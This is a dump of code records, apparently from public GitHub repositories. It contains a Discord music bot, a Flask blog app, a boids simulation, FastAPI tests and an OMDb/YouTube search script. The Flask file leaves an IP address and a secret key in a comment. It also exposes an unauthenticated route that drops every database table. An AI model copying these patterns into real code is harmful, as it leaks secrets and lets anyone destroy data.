widget\r\nfrom discord.enums import Status\r\nfrom discord.errors import PrivilegedIntentsRequired\r\nfrom discord.ext import commands, tasks\r\nfrom urllib import parse, request\r\nfrom discord.utils import get\r\nimport re\r\nimport youtube_dl\r\nimport os\r\nimport shutil\r\nfrom random import choice\r\n\r\n# --------------------------------------------------------\r\nbot = commands.Bot(command_prefix='>', description=\"This is a bot\")\r\n# --------------------------------------------------------\r\n@bot.event\r\nasync def on_ready():\r\n    # -------------------------------\r\n    canal = channel.VoiceChannel\r\n    if not canal: \r\n        voz = get(bot.voice_clients,guild=guild)\r\n        await voz.disconnect()\r\n    # -------------------------------\r\n    await bot.change_presence(activity= discord.Game(name=\"Type >\"))\r\n    print(\"BOT ONLINE\")\r\n# --------------------------------------------------------\r\nSTATUS_LIST = [\"Type >\"] # (assumed) minimal status pool; the original passed the function below to choice()\r\n@tasks.loop(seconds=20)\r\nasync def status(ctx):\r\n    await bot.change_presence(activity=discord.Game(choice(STATUS_LIST))) # fixed: `client` was an undefined name here\r\n\r\n# --------------------------------------------------------\r\n@bot.command(name='ping',help='Latency')\r\nasync def ping(ctx):\r\n    await ctx.send(f'**pong!** Latency: {round(bot.latency * 1000)}ms')\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def ven(ctx):\r\n    canal = ctx.message.author.voice.channel\r\n    if not canal:\r\n        await ctx.send('You are not connected to a VOICE channel')\r\n        return\r\n    voz = get(bot.voice_clients,guild=ctx.guild)\r\n    if voz and voz.is_connected():\r\n        await voz.move_to(canal)\r\n    else:\r\n        voz= await canal.connect()\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def vete(ctx):\r\n    canal = ctx.message.author.voice.channel\r\n    voz = get(bot.voice_clients,guild=ctx.guild)\r\n    await voz.disconnect()\r\n# --------------------------------------------------------\r\n@bot.event\r\nasync def on_member_join(member):\r\n    channel = discord.utils.get(member.guild.channels, name='general')\r\n    await channel.send(f'Welcome {member.mention}')\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True, name='play', help='Music command')\r\n
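# (added) >play: search YouTube for the query, download the top hit as MP3, and stream it in the caller's voice channel.\r\n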
async def play(ctx, *, search):\r\n    # --------------------------------------------------------\r\n    try:\r\n        canal = ctx.message.author.voice.channel\r\n    except:\r\n        await ctx.send('You are not connected to a VOICE channel')\r\n        return\r\n    voz = get(bot.voice_clients,guild=ctx.guild)\r\n    if voz and voz.is_connected():\r\n        await voz.move_to(canal)\r\n    else:\r\n        voz= await canal.connect()\r\n    # --------------------------------------------------------\r\n    query_string= parse.urlencode({'search_query':search})\r\n    html_content = request.urlopen('https://www.youtube.com/results?' + query_string)\r\n    search_results = re.findall( r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n    await ctx.send(\"https://www.youtube.com/watch?v=\"+search_results[0])\r\n# --------------------------------------------------------\r\n    def revisar_lista():\r\n        LR_en_Archivo=os.path.isdir(\"./Lista\")\r\n        if LR_en_Archivo is True:\r\n            DIR = os.path.abspath(os.path.realpath(\"Lista\"))\r\n            tamaño = len(os.listdir(DIR))\r\n            C_Activa=tamaño-1\r\n            try:\r\n                C_primera=os.listdir(DIR)[0]\r\n            except:\r\n                print(\"No songs\\n\")\r\n                listar.clear()\r\n                return\r\n            locatizacion_principal = os.path.dirname(os.path.realpath(__file__))\r\n            C_localizacion = os.path.abspath(os.path.realpath(\"Lista\")+\"\\\\\"+C_primera)\r\n            if tamaño !=0:\r\n                print(\"Song ready, it will play shortly\")\r\n                print(f\"Songs in the queue: {C_Activa}\")\r\n                C_Encontrada= os.path.isfile(\"cancion.mp3\")\r\n                if C_Encontrada:\r\n                    os.remove(\"cancion.mp3\")\r\n                shutil.move(C_localizacion,locatizacion_principal)\r\n                for file in os.listdir(\"./\"):\r\n                    if file.endswith(\".mp3\"):\r\n                        os.rename(file,'cancion.mp3')\r\n                voice.play(discord.FFmpegPCMAudio(\"cancion.mp3\"),after=lambda e:revisar_lista())\r\n                voice.source=discord.PCMVolumeTransformer(voice.source)\r\n                voice.source.volume= 20\r\n            else:\r\n                listar.clear()\r\n                return\r\n        else:\r\n            listar.clear()\r\n            print(\"The song was not added to the queue\")\r\n    \r\n    if not canal: \r\n        canal = ctx.message.author.voice.channel\r\n        voz = get(bot.voice_clients,guild=ctx.guild)\r\n        await voz.disconnect()\r\n# --------------------------------------------------------\r\n    C_Encontrada= os.path.isfile(\"cancion.mp3\")\r\n    try:\r\n        if C_Encontrada:\r\n            os.remove(\"cancion.mp3\")\r\n            listar.clear()\r\n            print(\"removed old file\")\r\n    except PermissionError:\r\n        print(\"tried to delete a file, but it is still being played\")\r\n        await ctx.send(\"ERROR: A song is still playing\")\r\n        return\r\n    LR_en_Archivo = os.path.isdir(\"./Lista\")\r\n    try:\r\n        LR_Carpeta=\"./Lista\"\r\n        if LR_en_Archivo is True:\r\n            print(\"Removed the old folder\")\r\n            shutil.rmtree(LR_Carpeta)\r\n    except:\r\n        print(\"No folder\")\r\n    await ctx.send(\"The song will play shortly\")\r\n    voice=get(bot.voice_clients,guild=ctx.guild)\r\n    ydl_op={\r\n        'format':'bestaudio/best',\r\n        'quiet': True,\r\n        'postprocessors':[{\r\n            'key':'FFmpegExtractAudio',\r\n            'preferredcodec':'mp3',\r\n            'preferredquality':'192', \r\n        }],\r\n    }\r\n    with youtube_dl.YoutubeDL(ydl_op) as ydl:\r\n        print(\"Downloading song\\n\")\r\n        link= search_results[0]\r\n        ydl.download([link])\r\n    for file in os.listdir(\"./\"):\r\n        if file.endswith(\".mp3\"):\r\n            name2 = file\r\n            print(f\"Renaming file: {file}\\n\")\r\n            os.rename(file,\"cancion.mp3\")\r\n    voz=get(bot.voice_clients,guild=ctx.guild)\r\n    voz.play(discord.FFmpegPCMAudio(\"cancion.mp3\"), after=lambda e: revisar_lista())\r\n
    voz.source=discord.PCMVolumeTransformer(voz.source)\r\n    voz.source.volume= 20\r\n\r\n    nombre= name2.rsplit(\"-\",2)\r\n    await ctx.send(f\"Now playing: {nombre[0]}\\n\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def awanta(ctx):\r\n    voz=get(bot.voice_clients,guild=ctx.guild)\r\n\r\n    if voz and voz.is_playing():\r\n        print(\"Music paused\")\r\n        voz.pause()\r\n        await ctx.send(\"Music paused\")\r\n    else:\r\n        print(\"Nothing is playing, nothing to pause\")\r\n        await ctx.send(\"Nothing is playing, nothing to pause\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def continua(ctx):\r\n    voz=get(bot.voice_clients,guild=ctx.guild)\r\n\r\n    if voz and voz.is_paused():\r\n        print(\"Resuming playback\")\r\n        voz.resume()\r\n        await ctx.send(\"Resuming playback\")\r\n    else:\r\n        print(\"No music is currently paused\")\r\n        await ctx.send(\"No music is currently paused\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def stop(ctx):\r\n    voz=get(bot.voice_clients,guild=ctx.guild)\r\n    if voz and voz.is_playing():\r\n        print(\"Music stopped\")\r\n        voz.stop()\r\n        await ctx.send(\"Music stopped\")\r\n    else:\r\n        print(\"Nothing is playing\")\r\n        await ctx.send(\"Nothing is playing\") # fixed: the original repeated \"Musica Detenida\" here even though nothing was playing\r\n# --------------------------------------------------------\r\n\r\n# --------------------------------------------------------\r\nlistar={}\r\n@bot.command(pass_context=True)\r\nasync def lista(ctx,*,search):\r\n    # --------------------------------------------------------\r\n    query_string= parse.urlencode({'search_query':search})\r\n
    html_content = request.urlopen('https://www.youtube.com/results?' + query_string)\r\n    search_results = re.findall( r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n    # await ctx.send(\"https://www.youtube.com/watch?v=\"+search_results[0])\r\n    # --------------------------------------------------------\r\n    cancion_lista = os.path.isdir(\"./Lista\")\r\n    if cancion_lista is False:\r\n        os.mkdir(\"Lista\")\r\n    DIR = os.path.abspath(os.path.realpath(\"Lista\"))\r\n    Lista_num = len(os.listdir(DIR))\r\n    Lista_num+=1\r\n    AgragarLista=True\r\n    while AgragarLista:\r\n        if Lista_num in listar:\r\n            Lista_num += 1 # fixed: the original `Lista_num=+1` reset the counter to 1 instead of incrementing it\r\n        else:\r\n            AgragarLista = False\r\n    listar[Lista_num]= Lista_num\r\n\r\n    Lista_path=os.path.abspath(os.path.realpath(\"Lista\") + f\"\\\\cancion{Lista_num}.%(ext)s\")\r\n    \r\n    ydl_op = {\r\n        'format': 'bestaudio/best',\r\n        'quiet':True,\r\n        'outtmpl':Lista_path,\r\n        'postprocessors': [{\r\n            'key': 'FFmpegExtractAudio',\r\n            'preferredcodec':'mp3',\r\n            'preferredquality':'192',\r\n        }],\r\n    }\r\n    with youtube_dl.YoutubeDL(ydl_op) as ydl:\r\n        print(\"Downloading song\")\r\n        link= search_results[0]\r\n        ydl.download([link])\r\n    await ctx.send(\"Added song number \"+str(Lista_num)+\" to the playback queue\")\r\n    print(\"Song added\")\r\n# --------------------------------------------------------\r\nbot.run('TOKEN')\r\n\r\n\r\n","repo_name":"hramses1/Bot-Discord","sub_path":"Bot-Discord-Hramses/discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22936636747","text":"from flask import Flask, redirect, url_for\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\n\nfrom forms import PostsForm\napp = Flask(__name__)\n\n# 2a02:c7f:8ee9:1800:95f3:9430:14e8:cf52 94.11.43.81 my IP\n# 3a617fb3dde7803d7e4513616c2973ee secret key\n\n\n# make more secure\napp.config['SECRET_KEY'] = environ.get('SECRET_KEY')\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://' + \\\n                                        environ.get('MYSQL_USER') + \\\n                                        ':' + \\\n                                        environ.get('MYSQL_PASSWORD') + \\\n                                        '@' + \\\n                                        environ.get('MYSQL_HOST') + \\\n                                        ':' + \\\n                                        environ.get('MYSQL_PORT') + \\\n                                        '/' + \\\n                                        environ.get('MYSQL_DB_NAME')\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Posts(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    f_name = db.Column(db.String(30), nullable=False)\n    l_name = db.Column(db.String(30), nullable=False)\n    title = db.Column(db.String(100), nullable=False)\n    content = db.Column(db.String(300), nullable=False, unique=True)\n\n    def __repr__(self):\n        return \"\".join(\n            [\n                'Title: ' + self.title + '\\n'\n                'First Name: ' + self.f_name + ' ' + self.l_name + '\\n'\n                'Content: ' + self.content\n            ]\n        )\n\n@app.route('/')\n@app.route('/home')\ndef home():\n    post_data = Posts.query.all()\n    return render_template('homepage.html', title='Homepage', posts=post_data)\n\n\n@app.route('/about')\ndef about():\n    return render_template('aboutpage.html', title='About')\n\n\n@app.route('/create', methods=['GET', 'POST'])\ndef create():\n    form = PostsForm()\n    if form.validate_on_submit():\n        post_data = Posts(\n            f_name=form.f_name.data,\n            l_name=form.l_name.data,\n            title=form.title.data,\n            content=form.content.data\n        )\n        db.session.add(post_data)\n        db.session.commit()\n        return redirect(url_for('home'))\n    else:\n        return render_template('create.html', title='Create a thing', form=form)\n\n# GET - which displays data\n# POST - which sends data from website to 
application\n# DELETE - deletes some data\n# Insert - sends data, but more used for updating\n\n# @app.route('/create')\n# def create():\n# db.create_all()\n# post = Posts(f_name='David', l_name='McCartney', title='What teh duhh', content='blah blah blah')\n# post1 = Posts(f_name='Bavid', l_name='Cartney', title='What teh geez', content='whooh blah blah')\n# db.session.add(post)\n# db.session.add(post1)\n# db.session.commit()\n# return 'Added the table and populated it with some records'\n\n\n@app.route('/delete')\ndef delete():\n db.drop_all()\n # db.session.query(Posts).delete()\n db.session.commit()\n return 'Everything is gone! Whoops!'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"DavidQATraining/firstFlaskApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30283220432","text":"import os\nimport random\n\nfrom learn import LearningModelInterface\n# from opensource.pracmln.pracmln_patched.mln.database import Database as DB\nfrom .state_inference import Database as DB\nfrom .state_inference import StateInfrence\nfrom collections import defaultdict\nfrom .utils import load_dbs\n\n\nclass PracmlnLearningModel(LearningModelInterface):\n def __init__(\n self,\n mln_database_path: str,\n domain_p_decs_path: str,\n max_databases=25,\n ):\n # load dataset\n databases = load_dbs(mln_database_path)\n random.shuffle(databases)\n databases = databases[:max_databases]\n self.dataset = [DB.parse_db(db) for db in databases]\n\n # initiate pracmln learner\n self.state_inference: StateInfrence = StateInfrence(\n os.path.normpath(os.path.join(os.getcwd(), domain_p_decs_path))\n )\n\n def train(self):\n # track how many databases were added for each action being learnt\n opt_tracker = defaultdict(int)\n for i, d in enumerate(self.dataset):\n # systematic noise on move function (to be moved to preprocessing)\n if d.action.name == \"move\":\n if opt_tracker[d.action.name] >= 1:\n # d.noise(0.3)\n d.sys_noise(\"conn(v0,v1,0)\", 0.5)\n # pass data through Markov Logic Network\n self.state_inference.process_database(d)\n opt_tracker[d.action.name] += 1\n # write data for metrics, remove for speed & space use reduction\n self.state_inference.save_data_for_graphing()\n # plot learning confidence results.\n self.state_inference.plot()\n","repo_name":"Occy88/action_model_reconstruction_framework","sub_path":"learn/pracmln_learning_model/pracmln_learning_model.py","file_name":"pracmln_learning_model.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21276643130","text":"class Boid:\n \n def __init__(self, boids, x, y, z):\n \n self.boids = boids\n self.flock = boids\n \n self.x = 1.0 * x\n self.y = 1.0 * y\n self.z = 1.0 * z\n \n self.vx = 0\n self.vy = 0\n self.vz = 0\n \n self.is_perching = False\n self._perch_t = 0\n\t \n \n def copy(self):\n \n b = Boid(self.boids, self.x, self.y, self.z)\n b.vx = self.vx\n b.vy = self.vy\n b.vz = self.vz\n b.is_perching = self.is_perching\n b._perch_t = self._perch_t\n \n return b\n \n def cohesion(self, d=100):\n \n \"\"\"Boids move towards the flock's centre of mass.\n\n The centre of mass is the average position of all boids, not\n including itself (the \"perceived centre\").\n \"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n vx, vy, vz = vx+b.x, vy+b.y, vz+b.z\n \n n = len(self.boids)-1\n vx, 
vy, vz = vx/n, vy/n, vz/n\n \n return (vx-self.x)/d, (vy-self.y)/d, (vz-self.z)/d\n \n def separation(self, r=10):\n \n \"\"\"Boids keep a small distance from other boids.\n\n Ensures that boids don't collide into each other, in a smoothly\n accelerated motion.\n \"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n if abs(self.x-b.x) < r: vx += (self.x-b.x)\n if abs(self.y-b.y) < r: vy += (self.y-b.y)\n if abs(self.z-b.z) < r: vz += (self.z-b.z)\n \n return vx, vy, vz\n \n def alignment(self, d=5):\n \n \"\"\"Boids match velocity with other boids.\"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n vx, vy, vz = vx+b.vx, vy+b.vy, vz+b.vz\n \n n = len(self.boids)-1\n vx, vy, vz = vx/n, vy/n, vz/n\n \n return (vx-self.vx)/d, (vy-self.vy)/d, (vz-self.vz)/d\n \n def limit(self, max=30):\n \n \"\"\"The speed limit for a boid.\n\n Boids can momentarily go very fast, something that is impossible\n for real animals.\n \"\"\"\n \n if abs(self.vx) > max: \n self.vx = self.vx/abs(self.vx)*max\n if abs(self.vy) > max: \n self.vy = self.vy/abs(self.vy)*max\n if abs(self.vz) > max: \n self.vz = self.vz/abs(self.vz)*max\n \n def _angle(self):\n \n \"\"\"Returns the angle towards which the boid is steering.\"\"\"\n \n from math import atan, pi, degrees\n a = degrees(atan(self.vy/self.vx)) + 360\n if self.vx < 0: a += 180\n\n return a\n \n angle = property(_angle)\n \n def goal(self, x, y, z, d=50.0):\n \n \"\"\"Tendency towards a particular place.\"\"\"\n \n return (x-self.x)/d, (y-self.y)/d, (z-self.z)/d\n \nclass Boids(list):\n \n def __init__(self, n, x, y, w, h):\n \n for i in range(n):\n dx = _ctx.random(w)\n dy = _ctx.random(h)\n z = _ctx.random(200)\n b = Boid(self, x+dx, y+dy, z)\n self.append(b)\n \n self.x = x\n self.y = y\n self.w = w\n self.h = h\n \n self.scattered = False\n self._scatter = 0.005\n self._scatter_t = 50\n self._scatter_i = 0\n \n self._perch = 1.0 # Lower this number to simulate diving.\n self._perch_y = _ctx.HEIGHT\n self._perch_t = lambda:25+_ctx.random(50)\n \n self.has_goal = False\n self.flee = False\n self._gx = 0\n self._gy = 0\n self._gz = 0\n\t\n \n def copy(self):\n \n boids = Boids(0, self.x, self.y, self.w, self.h)\n \n boids.scattered = self.scattered\n boids._scatter = self._scatter\n boids._scatter_t = self._scatter_t\n boids._scatter_i = self._scatter_i\n \n boids._perch = self._perch\n boids._perch_y = self._perch_y\n boids._perch_t = self._perch_t\n \n boids.has_goal = self.has_goal\n boids.flee = self.flee\n boids._gx = self._gx\n boids._gy = self._gy\n boids._gz = self._gz\n \n for boid in self:\n boids.append(boid.copy())\n \n return boids\n\n def scatter(self, chance=0.005, frames=50):\n \n self._scatter = chance\n self._scatter_t = frames\n \n def noscatter(self):\n \n self._scatter = 0.0\n \n def perch(self, ground=None, chance=1.0, frames=lambda:25+_ctx.random(50)):\n \n if ground == None:\n ground = _ctx.HEIGHT\n \n self._perch = chance\n self._perch_y = ground\n self._perch_t = frames\n \n def noperch(self):\n \n self._perch = 0.0\n \n def goal(self, x, y, z, flee=False):\n \n self.has_goal = True\n self.flee = flee\n self._gx = x\n self._gy = y\n self._gz = z\n \n def nogoal(self):\n \n self.has_goal = False\n \n def constrain(self):\n \n \"\"\"Cages the flock inside the x, y, w, h area.\n\n The actual cage is a bit larger,\n so boids don't seem to bounce of invisible walls\n (they are rather \"encouraged\" to stay in the area).\n\n If a boid touches the ground level,\n it may decide to perch there for a while.\n 
\"\"\"\n \n dx = self.w * 0.1\n dy = self.h * 0.1 \n \n for b in self:\n \n if b.x < self.x-dx: b.vx += _ctx.random(dx)\n if b.y < self.y-dy: b.vy += _ctx.random(dy)\n if b.x > self.x+self.w+dx: b.vx -= _ctx.random(dx)\n if b.y > self.y+self.h+dy: b.vy -= _ctx.random(dy)\n if b.z < 0: b.vz += 10\n if b.z > 100: b.vz -= 10\n \n if b.y > self._perch_y and _ctx.random() < self._perch:\n b.y = self._perch_y\n b.vy = -abs(b.vy) * 0.2\n b.is_perching = True\n try:\n b._perch_t = self._perch_t()\n except:\n b._perch_t = self._perch_t\n \n def update(\n self, \n shuffled=True, \n cohesion=100, \n separation=10, \n alignment=5, \n goal=20,\n limit=30,\n ):\n \n \"\"\"Calculates the next motion frame for the flock.\"\"\"\n \n # Shuffling the list of boids ensures fluid movement.\n # If you need the boids to retain their position in the list\n # each update, set the shuffled parameter to False.\n from random import shuffle\n if shuffled: shuffle(self)\n \n m1 = 1.0 # cohesion\n m2 = 1.0 # separation\n m3 = 1.0 # alignment\n m4 = 1.0 # goal\n \n # The flock scatters randomly with a Boids.scatter chance.\n # This means their cohesion (m1) is reversed,\n # and their joint alignment (m3) is dimished,\n # causing boids to oscillate in confusion.\n # Setting Boids.scatter(chance=0) ensures they never scatter.\n if not self.scattered and _ctx.random() < self._scatter:\n self.scattered = True\n if self.scattered:\n m1 = -m1\n m3 *= 0.25\n self._scatter_i += 1\n if self._scatter_i >= self._scatter_t:\n self.scattered = False\n self._scatter_i = 0\n\n # A flock can have a goal defined with Boids.goal(x,y,z),\n # a place of interest to flock around.\n if not self.has_goal:\n m4 = 0\n if self.flee:\n m4 = -m4\n \n for b in self:\n \n # A boid that is perching will continue to do so\n # until Boid._perch_t reaches zero.\n if b.is_perching:\n if b._perch_t > 0:\n b._perch_t -= 1\n continue\n else:\n b.is_perching = False\n \n vx1, vy1, vz1 = b.cohesion(cohesion)\n vx2, vy2, vz2 = b.separation(separation)\n vx3, vy3, vz3 = b.alignment(alignment)\n vx4, vy4, vz4 = b.goal(self._gx, self._gy, self._gz, goal)\n \n b.vx += m1*vx1 + m2*vx2 + m3*vx3 + m4*vx4\n b.vy += m1*vy1 + m2*vy2 + m3*vy3 + m4*vy4\n b.vz += m1*vz1 + m2*vz2 + m3*vz3 + m4*vz4\n \n b.limit(limit)\n \n b.x += b.vx\n b.y += b.vy\n b.z += b.vz\n \n self.constrain()\n \ndef flock(n, x, y, w, h):\n return Boids(n, x, y, w, h)\n","repo_name":"shoebot/shoebot","sub_path":"lib/boids/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"78"} +{"seq_id":"22447748010","text":"from fastapi import FastAPI\nfrom fastapi.testclient import TestClient\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\nfrom routes import router as blog_router\n\napp = FastAPI()\nconfig = dotenv_values(\".env\")\napp.include_router(blog_router, tags=[\"blog\"], prefix=\"/blog\")\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n app.mongodb_client = MongoClient(config[\"ATLAS_URI\"])\n app.database = app.mongodb_client[config[\"DB_NAME\"] + \"test\"]\n\n# @app.on_event(\"shutdown\")\n# async def shutdown_event():\n# app.mongodb_client.close()\n# app.database.drop_collection(\"blogs\")\n\ndef test_create_blog():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 201\n\n body = response.json()\n 
assert body.get(\"title\") == \"Title test\"\n assert body.get(\"content\") == \"Content test\"\n assert body.get(\"author\") == \"Kahouli test\"\n assert \"_id\" in body\n\n\ndef test_create_blog_missing_title():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"content\": \"Content test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 422\n\n\ndef test_create_blog_missing_author():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\"})\n assert response.status_code == 422\n\ndef test_create_blog_missing_content():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 422\n\n\n\ndef test_get_blog():\n with TestClient(app) as client:\n new_blog = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\", \"author\": \"Kahouli test\"}).json()\n\n get_blog_response = client.get(\"/blog/\" + new_blog.get(\"_id\"))\n assert get_blog_response.status_code == 200\n assert get_blog_response.json() == new_blog\n\n\ndef test_get_blog_unexisting():\n with TestClient(app) as client:\n get_blog_response = client.get(\"/blog/unexisting_id\")\n assert get_blog_response.status_code == 404\n\n\n# def test_update_book():\n# with TestClient(app) as client:\n# new_book = client.post(\"/book/\", json={\"title\": \"Don Quixote\", \"author\": \"Miguel de Cervantes\", \"synopsis\": \"...\"}).json()\n\n# response = client.put(\"/book/\" + new_book.get(\"_id\"), json={\"title\": \"Don Quixote 1\"})\n# assert response.status_code == 200\n# assert response.json().get(\"title\") == \"Don Quixote 1\"\n\n\n# def test_update_book_unexisting():\n# with TestClient(app) as client:\n# update_book_response = client.put(\"/book/unexisting_id\", json={\"title\": \"Don Quixote 1\"})\n# assert update_book_response.status_code == 404\n\n\n# def test_delete_book():\n# with TestClient(app) as client:\n# new_book = client.post(\"/book/\", json={\"title\": \"Don Quixote\", \"author\": \"Miguel de Cervantes\", \"synopsis\": \"...\"}).json()\n\n# delete_book_response = client.delete(\"/book/\" + new_book.get(\"_id\"))\n# assert delete_book_response.status_code == 204\n\n\n# def test_delete_book_unexisting():\n # with TestClient(app) as client:\n # delete_book_response = client.delete(\"/book/unexisting_id\")\n # assert delete_book_response.status_code == 404\n\n","repo_name":"kahouliiAlaa/BlogApplication","sub_path":"server/test_blogs_apis.py","file_name":"test_blogs_apis.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2057946203","text":"# app/seach_service.py\n\nimport os\nimport json\n\nfrom dotenv import load_dotenv\nimport requests\nimport re\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nimport webbrowser\n\nload_dotenv()\n\nOMDB_API_KEY = os.environ.get(\"OMDB_API_KEY\")\n\nYOUTUBE_API_KEY = os.environ.get(\"YOUTUBE_API_KEY\")\nYOUTUBE_API_SERVICE_NAME='youtube'\nYOUTUBE_API_VERSION='v3'\n\ndef get_response(title):\n \"\"\"\n Issues a request and parses response\n Param: (movie or tv show) title (str) like \"Iron Man\" or \"Game of Thrones\"\n Example: get_response(\"Iron Man\")\n Returns: parsed_response # dictionary representing the original JSON response\n \"\"\"\n # how to replace whitespaces (source): 
https://stackoverflow.com/questions/1007481/how-do-i-replace-whitespaces-with-underscore-and-vice-versa\n    title = title.replace(\" \", \"+\")  # transforms the user input so that it is suitable for the request url later\n\n    request_url = f\"https://omdbapi.com/?s={title}&apikey={OMDB_API_KEY}\"\n    response = requests.get(request_url)\n\n    # validating user's input\n    if \"\\\"Response\\\":\\\"False\\\"\" in response.text:\n        print(\"Oops, couldn't find that movie. Please try again.\")\n        exit()\n\n    parsed_response = json.loads(response.text)\n    return parsed_response\n\ndef get_response_2(id):\n    \"\"\"\n    Issues a request and parses response\n    Param: (valid IMDb) id (str) like \"tt0371746\"\n    Example: get_response(\"tt0371746\")\n    Returns: parsed_response # dictionary representing the original JSON response\n    \"\"\"\n\n    request_url = f\"https://omdbapi.com/?i={id}&apikey={OMDB_API_KEY}\"\n    response = requests.get(request_url)\n\n    # validating id\n    if \"\\\"Response\\\":\\\"False\\\"\" in response.text:\n        print(\"Oops, couldn't find that movie. Please try again.\")\n        exit()\n\n    parsed_response = json.loads(response.text)\n    return parsed_response\n\n# title lookup results from search\ndef print_sr(search_results, readable_list):\n    \"\"\"\n    Prints results of movie lookup (movie/tv show title and release year)\n    Param: search_results (list) like sr and readable_list (list) like org_list\n    Example: print_sr(sr, org_list)\n    Returns: None\n    \"\"\"\n\n    for title in search_results:\n        readable_list.append(title[\"Title\"] + \", \" + title[\"Year\"].replace(\"–\",\"-\"))\n        print(title[\"Title\"] + \" (\" + title[\"Year\"] +\")\") # prints a list of the search results' title and release year\n\n    return None\n\n# Titlecase string\ndef title_except(s, exceptions):\n    \"\"\"\n    Transforms string so that it will capitalize the first letter in each word, with some exceptions\n    Source: https://stackoverflow.com/questions/3728655/titlecasing-a-string-with-exceptions/3729060\n    Param: s (str) like \"Hi, my name is john smith\" and exceptions (list of str) like [\"a\", \"an\", \"is\"]\n    Example: title_except(\"Hi, my name is john smith\", [\"a\", \"an\", \"is\"])\n    Returns: \"Hi, My Name is John Smith\"\n    \"\"\"\n    word_list = re.split(' ', s) # re.split behaves as expected\n    final = [word_list[0].capitalize()]\n    for word in word_list[1:]:\n        final.append(word if word in exceptions else word.capitalize())\n    return \" \".join(final)\n\n# finds YouTube trailer\ndef youtube_search(options):\n    \"\"\"\n    Searches for YouTube video \n    \n    Source: https://github.com/youtube/api-samples/blob/master/python/search.py\n    Param: options (str) like \"Iron Man\"\n    Example: youtube_search(\"Iron Man\")\n    Returns: url link to trailer\n    \"\"\"\n    youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n    developerKey=YOUTUBE_API_KEY)\n\n    # Call the search.list method to retrieve results matching the specified query term.\n    search_response = youtube.search().list(\n        q=options + \" trailer\",\n        part='id,snippet',\n        maxResults=1\n    ).execute()\n\n    # Add each result to the appropriate list, and then display the lists of matching videos, channels, and playlists.\n    for search_result in search_response.get('items', []):\n        if search_result['id']['kind'] == 'youtube#video': \n            #print ('YouTube Trailer:\\n', search_result['snippet']['title'])\n            #print(' ' + 'https://www.youtube.com/watch?v=' + search_result['id']['videoId'])\n            trailer_url = \"https://www.youtube.com/watch?v=\" + search_result['id']['videoId']\n            
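# NOTE: only the first search hit is inspected (maxResults=1 above); if that hit\n            # is not a video -- or the result list is empty -- control falls through and\n            # the function implicitly returns None, so callers should check the returned\n            # URL before passing it to webbrowser.open().\n            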
print(\"----------------------------------\")\n return trailer_url\n else:\n print('Sorry, a trailer could not be found for this movie.')\n print(\"----------------------------------\")\n\nif __name__ == \"__main__\":\n\n #\n # INFO INPUTS\n #\n\n title = input(\"Please enter a movie or tv show title (i.e. 'Iron Man' or 'Game of Thrones'): \") # accept user input\n\n parsed_response = get_response(title)\n\n sr = parsed_response[\"Search\"] # search results\n\n\n # if there is more than one result, then the program will have the user choose the title they were looking for\n # from a list; otherwise, the program will go ahead and display the information of the one found result\n if int(parsed_response[\"totalResults\"]) > 1:\n \n org_list = []\n\n print_sr(sr, org_list)\n print(\"----------------------------------\")\n\n while True:\n correct_search = input(\"From the list above, what title were you looking for? Please write in the format of Title, Year (i.e. The Avengers, 1998): \")\n \n articles = ['a', 'an', 'of', 'the', 'is', 'with', 'in']\n correct_search = title_except(correct_search, articles)\n\n correct_title = correct_search.split(\", \")\n correct_name = correct_title[0]\n\n if (correct_search) in org_list:\n i = org_list.index(correct_search) # finds the index of the title the user is looking for in org_list so it can be matched with the one in the parsed_response\n id = sr[i][\"imdbID\"] \n break\n else:\n print(\"Sorry, there was no match to the list above. Please try again and make sure you're writing in the correct format.\")\n else:\n id = sr[0][\"imdbID\"]\n correct_name = title\n correct_search = title\n\n\n # make another request to match ids\n parsed_response = get_response_2(id)\n\n title_name = parsed_response[\"Title\"]\n release_year = parsed_response[\"Year\"]\n genre = parsed_response[\"Genre\"]\n 